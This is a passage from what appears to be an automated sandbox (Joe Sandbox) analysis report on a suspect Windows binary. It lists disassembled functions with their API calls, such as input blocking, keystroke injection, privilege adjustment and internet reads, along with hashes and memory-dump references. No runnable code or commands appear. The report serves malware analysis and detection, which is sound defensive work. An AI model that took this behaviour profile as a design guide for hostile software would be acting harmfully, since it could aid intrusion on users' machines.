                                                                                                                                                                              • Opcode Fuzzy Hash: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
                                                                                                                                                                              • Instruction Fuzzy Hash: BA323675A007059FC728CF69C580A6AB7F0FF48320B11C46EE59ADB3A1D7B4E941CB48
                                                                                                                                                                              Function 004CAD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004CAE5E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongProcWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3265722593-0
                                                                                                                                                                              • Opcode ID: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
                                                                                                                                                                              • Instruction ID: 85105f0f15bc4f7bc609199ac69594c614b05064e83fe97fc201a31f5d048ce6
                                                                                                                                                                              • Opcode Fuzzy Hash: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
                                                                                                                                                                              • Instruction Fuzzy Hash: 32A10C6810411DBADB64AA296C89FBF3D6DFF96348B14453FF402D21D1C51D8C61A3BB
                                                                                                                                                                              Function 0050550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00504A1E,00000000), ref: 005055FD
                                                                                                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00505629
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 599397726-0
                                                                                                                                                                              • Opcode ID: 24ea3d1cab102676be6eabc6930fd2e1eec7a6d9f3455a4a5166027d11c520da
                                                                                                                                                                              • Instruction ID: a1bcb6bd33f0d54d8b91b1aa0059e3f9a7ca82bb71bc1f764538ab369229c2bd
                                                                                                                                                                              • Opcode Fuzzy Hash: 24ea3d1cab102676be6eabc6930fd2e1eec7a6d9f3455a4a5166027d11c520da
                                                                                                                                                                              • Instruction Fuzzy Hash: BB41C171500A09BFEB109A91DC85FBFBBBDFB80758F10442EF605A62C0FA719E419E64
                                                                                                                                                                              Function 004FEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FEA95
                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004FEAEF
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004FEB3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1682464887-0
                                                                                                                                                                              • Opcode ID: 619424511f357c6408a92c4f0af778b80ee1eeb2e183a23a766702a8dd6139f4
                                                                                                                                                                              • Instruction ID: faf0b1c6fbe5461e1a7abf7141929731f0d5012fa4a7755f5ded6eae68565b46
                                                                                                                                                                              • Opcode Fuzzy Hash: 619424511f357c6408a92c4f0af778b80ee1eeb2e183a23a766702a8dd6139f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B217F35A00208EFCB00DFA6D884AEEBBB4FF48314F14809AE505A7351DB759905CB54
                                                                                                                                                                              Function 004F702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F704C
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004F708D
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004F7098
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 33631002-0
                                                                                                                                                                              • Opcode ID: 332754e47ec70ba6b61ccef73aadf930f5728ab5351e6a2fba1e957b1cac1c1c
                                                                                                                                                                              • Instruction ID: 75eb93b7a674d4d2271690b37e7b3af752799af24eff512f6476961235c7e84a
                                                                                                                                                                              • Opcode Fuzzy Hash: 332754e47ec70ba6b61ccef73aadf930f5728ab5351e6a2fba1e957b1cac1c1c
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E113C71A00228BFEB108BA4EC45AAFBBBCEB45B10F104152FA00E7290D6745A059BA5
                                                                                                                                                                              Function 004FFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004FFD71
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004FFDA1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                              • Opcode ID: a3a66f5bad4eb2ba520a8acbba551a332a5d7f4a8315de0b12ba1dde2a403c03
                                                                                                                                                                              • Instruction ID: 3ba307f5f602dc2318391a3208ab3182383c1511d4261d261c77ca99c7dc8cb6
                                                                                                                                                                              • Opcode Fuzzy Hash: a3a66f5bad4eb2ba520a8acbba551a332a5d7f4a8315de0b12ba1dde2a403c03
                                                                                                                                                                              • Instruction Fuzzy Hash: C811A1316102059FD700EF29D845A2AF7E8FF84324F00851EF9A59B391DB74EC05CB99
                                                                                                                                                                              Function 004FD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD73F
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0050C2E2,?,?,00000000,?), ref: 004FD751
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                              • Opcode ID: cc4338653b9c5b3dbfb72158209f28b1c3a484932d5b6aba70283b4d586b83fa
                                                                                                                                                                              • Instruction ID: 25adeb4a2d2fbaf6a79dacc5a1def1a59d3fb017eb18bd539ff102bc2b1bdba4
                                                                                                                                                                              • Opcode Fuzzy Hash: cc4338653b9c5b3dbfb72158209f28b1c3a484932d5b6aba70283b4d586b83fa
                                                                                                                                                                              • Instruction Fuzzy Hash: F5F0E23540032DEBDB10AFA4CC88FEB77BDAF49351F008416B905D6181D274D940DBB4
                                                                                                                                                                              Function 004F4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004F4B89
                                                                                                                                                                              • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 004F4B9C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InputSendkeybd_event
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3536248340-0
                                                                                                                                                                              • Opcode ID: 092b47b44b191ca5a7a33513ee523c8abf7920c12ee4d35d1acc4aa36286586c
                                                                                                                                                                              • Instruction ID: b659d86d1eb6a4ba456d598dafd8971103e38cd14e4fc04e2f0064f66a5957b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 092b47b44b191ca5a7a33513ee523c8abf7920c12ee4d35d1acc4aa36286586c
                                                                                                                                                                              • Instruction Fuzzy Hash: 8DF0907080034DAFDB058FA0C805BBE7BB4EF00305F00840AFD51A6292D779D616EFA4
                                                                                                                                                                              Function 004EB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 81990902-0
                                                                                                                                                                              • Opcode ID: 7003617a6af737e884525924c73aa728c5830ec8535b8b72e46239289ed65b8f
                                                                                                                                                                              • Instruction ID: cff0c150c746e4c50f038c0925a22c16871ca69a26a217c3ae45a6a012a97d47
                                                                                                                                                                              • Opcode Fuzzy Hash: 7003617a6af737e884525924c73aa728c5830ec8535b8b72e46239289ed65b8f
                                                                                                                                                                              • Instruction Fuzzy Hash: DEE09A71004511AEE7262B51EC0996777FDEF04315B10851AB45581570D7665C94EB64
                                                                                                                                                                              Function 004D8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,004B125D,004D7A43,004B0F35,?,?,00000001), ref: 004D8E41
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004D8E4A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                              • Opcode ID: 272f67a49063f2b821266377434a100e451c77e75c3d79590908ba3f269742a0
                                                                                                                                                                              • Instruction ID: 5dd64676e5723fe3a5425e27f4b4a7b4d8d9ca5f3db53535470390ad1cbd1d48
                                                                                                                                                                              • Opcode Fuzzy Hash: 272f67a49063f2b821266377434a100e451c77e75c3d79590908ba3f269742a0
                                                                                                                                                                              • Instruction Fuzzy Hash: 5EB09271044A08ABEA802BA1FC09B883F78EB18A62F004410F61D852608B635854AAA2
                                                                                                                                                                              Function 004E113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 686410f650a5d93ae00e0702a561ee1009ad979be5a2926bd42764179638f85e
                                                                                                                                                                              • Instruction ID: 4aa2e26c58c16edbd6f41b1477648079159f75888e43c29bd733d6f2d9f7ff91
                                                                                                                                                                              • Opcode Fuzzy Hash: 686410f650a5d93ae00e0702a561ee1009ad979be5a2926bd42764179638f85e
                                                                                                                                                                              • Instruction Fuzzy Hash: 2FB1E024D2AF504ED62396398835336B75CAFBB2C9F91D71BFC2A70D22FB2185875180
                                                                                                                                                                              Function 0050703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • BlockInput.USER32(00000001), ref: 00507057
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BlockInput
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                                                              • Opcode ID: 3f6621f8a7be10c993940a329ca515df474b9107da86dfeb73f131288c722dfb
                                                                                                                                                                              • Instruction ID: ef3789008aeb417bb87717b447286872985036ecf3c3e96f430c9a130e28e859
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f6621f8a7be10c993940a329ca515df474b9107da86dfeb73f131288c722dfb
                                                                                                                                                                              • Instruction Fuzzy Hash: 85E012366142049FC7109B6AD859E9AB7ECAF58750F00842BB945D7291DAB4E8049BA0
                                                                                                                                                                              Function 004F7DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004F7DF8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: mouse_event
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2434400541-0
                                                                                                                                                                              • Opcode ID: a791a73110f11c7ccac1c3446b0ab37200a28e18cc677823eff44ce49605ac84
                                                                                                                                                                              • Instruction ID: 9117a59b7f989b2817a0310d4a4206a83bfcad1fb24b813bfc77bf396e9e4a0a
                                                                                                                                                                              • Opcode Fuzzy Hash: a791a73110f11c7ccac1c3446b0ab37200a28e18cc677823eff44ce49605ac84
                                                                                                                                                                              • Instruction Fuzzy Hash: 69D09EA516C60E79FD5907209C2FFBB1119EB517C1FE4564BB301C62C1ECDC6845643D
                                                                                                                                                                              Function 004D8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004D8E1F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                              • Opcode ID: 4c57746095bbec24639338e4ca5d1d0878b3746848726be699e092cabaec55a4
                                                                                                                                                                              • Instruction ID: 4cf943df9b69f32bb2e1efac5a7b956e88ba0c4b13491cc03be9de2783574d86
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c57746095bbec24639338e4ca5d1d0878b3746848726be699e092cabaec55a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 7CA0243000050CF7CF001F51FC044447F7CD7041507004010F40C41131C7335C1055D1
                                                                                                                                                                              Function 004DA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(004D6AE9,005667D8,00000014), ref: 004DA937
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                              • Opcode ID: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                                                                                                                                              • Instruction ID: 20740c7f761e930f9ceb432e5b1f6231eb8c56b68af69659e7c6062a416d8d85
                                                                                                                                                                              • Opcode Fuzzy Hash: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CB012B03031028BD7084B38FC5411A79F45759101301503D7407C36A0DB308454FF00
                                                                                                                                                                              Function 004D0EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                              • Instruction ID: d7c450a05304a7b8df95740e122e2e54414d041f643437ea2c958e9208378171
